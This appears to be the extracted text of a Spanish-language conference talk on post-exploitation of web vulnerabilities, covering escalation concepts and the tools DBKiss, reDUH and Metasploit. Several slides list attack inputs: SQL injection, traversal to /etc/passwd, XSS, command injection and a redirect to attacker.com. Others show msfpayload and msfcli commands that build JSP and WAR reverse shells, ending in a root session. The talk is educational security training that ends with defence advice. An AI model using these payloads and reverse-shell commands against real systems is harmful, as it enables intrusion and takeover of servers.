El documento presenta las fases de post-explotación luego de comprometer un sitio web, incluyendo escalamiento horizontal y vertical, herramientas como DBKiss, reDUH y Metasploit Web Payloads, y técnicas como aprovechar la red de confianza del equipo vulnerado. El orador explica conceptos clave de post-explotación y realiza demostraciones prácticas de herramientas.

1. Nahuel Grisolíanahuel@bonsai-sec.comBonsaiInformation Securityhttp://www.bonsai-sec.comPost Explotación de Vulnerabilidades Web

2. 2Presentación

3. Fasesclave deun test de Intrusión

4. Vulnerabilidades típicasparalograrel compromiso de un sitio Web

5. Técnicas de explotación básica

6. La Post-Explotación

7. Escalamiento horizontal y vertical

8. Herramientas de Post Explotación

9. Introducción reDUH, DBKissy Metasploit Web Payloads

10. Aprovechando la red de confianza del equipovulnerado

11. Demos

12. DBKiss y reDUH

13. Metasploit Web Payloads – No interactiva

14. Conclusiones

15. Preguntas y Respuestas3Quién soy? Quéhago? Dónde?NahuelGrisolía- CEHPenetration Testing Team @ BonsaiEMAIL: nahuel@bonsai-sec.comWEB SITE: http://www.bonsai-sec.com

16. 4FasesClásicas de un Test de IntrusiónDescubrimientoAnálisisExplotaciónEscalamiento

17. 5Vulnerabilidades Web TípicasOWASP Top Ten! COOL! ;)

18. Excelentedocumentación en el sitio

19. Actualizado al 19 de Abril de 2010

20. Lineamientos a seguir y verificacionesque no hay quedejar de lado

21. ¡Este hallazgo no me sirveparaescalar!

22. ¿Cuáles de lasvulnerabilidadesmáscomunes me podríanpermitirfuturosescalamientos? ¿Cuáles no?6The Basics Explainedindex.php?id=1 and 1=1--

23. get_documento.jsp?fichero=../../../../../../../../etc/passwd

24. error_page.pl?mensaje=<script>alert(“XSS”);</script>

25. /Cuentas/miCuenta!getSaldo=[ID DE OTRA CUENTA]

26. sitio.php?pagina=../../../../../tmp/uploads/shell.php

27. Listar_archivos.seam?dir=; cat /etc/passwd> /var/www/a.txt ;

28. error_redirect.asp=http://www.attacker.com

29. http://www.verysecure.com/login.asp

30. /admin/avatar_upload.php & uploaded_files/my_atavar.php7La Fase de Post-ExplotaciónYA TENGO CIERTO CONTROL… y AHORA?TOOLS DISPONIBLESTÉCNICASPost ExplotaciónExplotaciónEscalamiento

31. 8Escalamiento Vertical vs. HorizontalEscalamiento VerticalAcceso a funcionalidadesadministrativas no autorizadas

32. Elevación de Privilegios de un usuarioválido

33. Acceso a credencialesválidas de un usuario de mayoresprivilegios

34. Token kidnapping en plataforma Microsoft Windows Escalamiento HorizontalAccesopor rlogin, ssh a equiposadyacentes, porejemplo, en la DMZ

35. Scripts con credenciales en textoclaro de un servidor FTP de confianza

36. Reutilización de credenciales entre equipos9HerramientasDBKiss

37. reDUH

38. Metasploit Web Payloads10DBKiss Un browser de Base de datosMySQL y Postgresql en un simple archivo PHP

39. Features: Import/Export, search, SQL editor, etc.

40. Últimaactualización 21 de Mayo, 2010

41. http://www.gosu.pl/dbkiss/11Demo!DBKiss12reDUHPermiterealizarconexiones a servicios a través de HTTP (ó HTTPS)

42. Esquemacliente (JAVA) / servidor (varioslenguajes)

43. Posibilidad de Bypass de reglas de Firewall

44. http://www.sensepost.com/labs/tools/pentest/reduh13reDUH (2)

45. 14Demo!reDUH15Metasploit Web PayloadsUsage: ./msfpayload<payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]avascript|e[X]ecutable|[V]BA|[W]ar>php/bind_php Listen for a connection and spawn a command shell via php

46. php/download_exec Download an EXE from a HTTP URL and execute it

47. php/exec Execute a single system command

48. php/reverse_perl Creates an interactive shell via perl

49. php/reverse_php Reverse PHP connect back shell with checks for disabled functions16Metasploit Web Payloads (2)hacker@gothamcity:/pentest/exploits/framework3# ./msfpayload java/jsp_shell_reverse_tcp LHOST=10.10.1.132 LPORT=8080 R>shell.jsp&& ./msfcli exploit/multi/handler payload=java/jsp_shell_reverse_tcp LHOST=10.10.1.132 LPORT=8080 E[*] Please wait while we load the module tree...[*] Started reverse handler on port 8080[*] Starting the payload handler..../msfpayload linux/x86/shell_reverse_tcp LHOST=10.31.33.7 LPORT=443 W>shell_reverse_tcp.warunzip -lshell_reverse_tcp.war1582 04-28-10 22:40 mcyowonbnhrqsyy.jsp./msfcli exploit/multi/handler PAYLOAD=linux/x86/shell_reverse_tcp LHOST=10.31.33.7 LPORT=443 E[*] Command shell session 1 opened (10.31.33.7:443 -> 10.1.2.3:41221)whoami root

50. 17Aprovechando la Red de ConfianzaConexiones a Servidores de Base de Datos… ¿¿¿sólo a puertosespecíficos???

51. DMZ Mal (muy mal) configurada… Mi Microsoft IIS dondetengomi Web perteneceal Dominio General y se puedeconectar al Controlador de Dominio. OMG!

52. Equiposadyacentes en DMZ con credencialestriviales o reutilizadas– “SI DESDE AFUERA NO SE VE, yafue! Le dejoadmin:admin”

53. En localhosttengo un Apache Tomcat corriendocomoroot. “OLVIDATE, desde AFUERA no se ve! Dejaleadmin:tomcat”18Conclusiones Las posibilidades, herramientas y técnicas de post explotación son numerosas

54. Etapaquegeneralmente no se llevaadelante de maneracompleta y exhaustiva

55. En un ataque real, es la fasemáspeligrosa

56. Defensa en Profundidad, la mejoraliada

57. Web Application Firewalls, buenos amigos

58. Analizadores de Logs y Tráfico19Preguntas? Respuestas!

59. 20Preguntas?(algunasquepodríanestarhaciendo… ;) Después de esto… acaso… ¿está todo perdido?

60. Me interesaría aprender más sobre esto, ¿como puedo hacer?

61. ¿Podés volver atrás? que no entendí la diferencia entre eso de Horizontal y Vertical…

62. Post Explotación? Dónde era que quedaba entre las fases básicas? Cuáles eran?Post Explotación de Vulnerabilidades Web¡¡¡GRACIAS!!!Nahuel Grisolíanahuel@bonsai-sec.comBonsaiInformation Securityhttp://www.bonsai-sec.com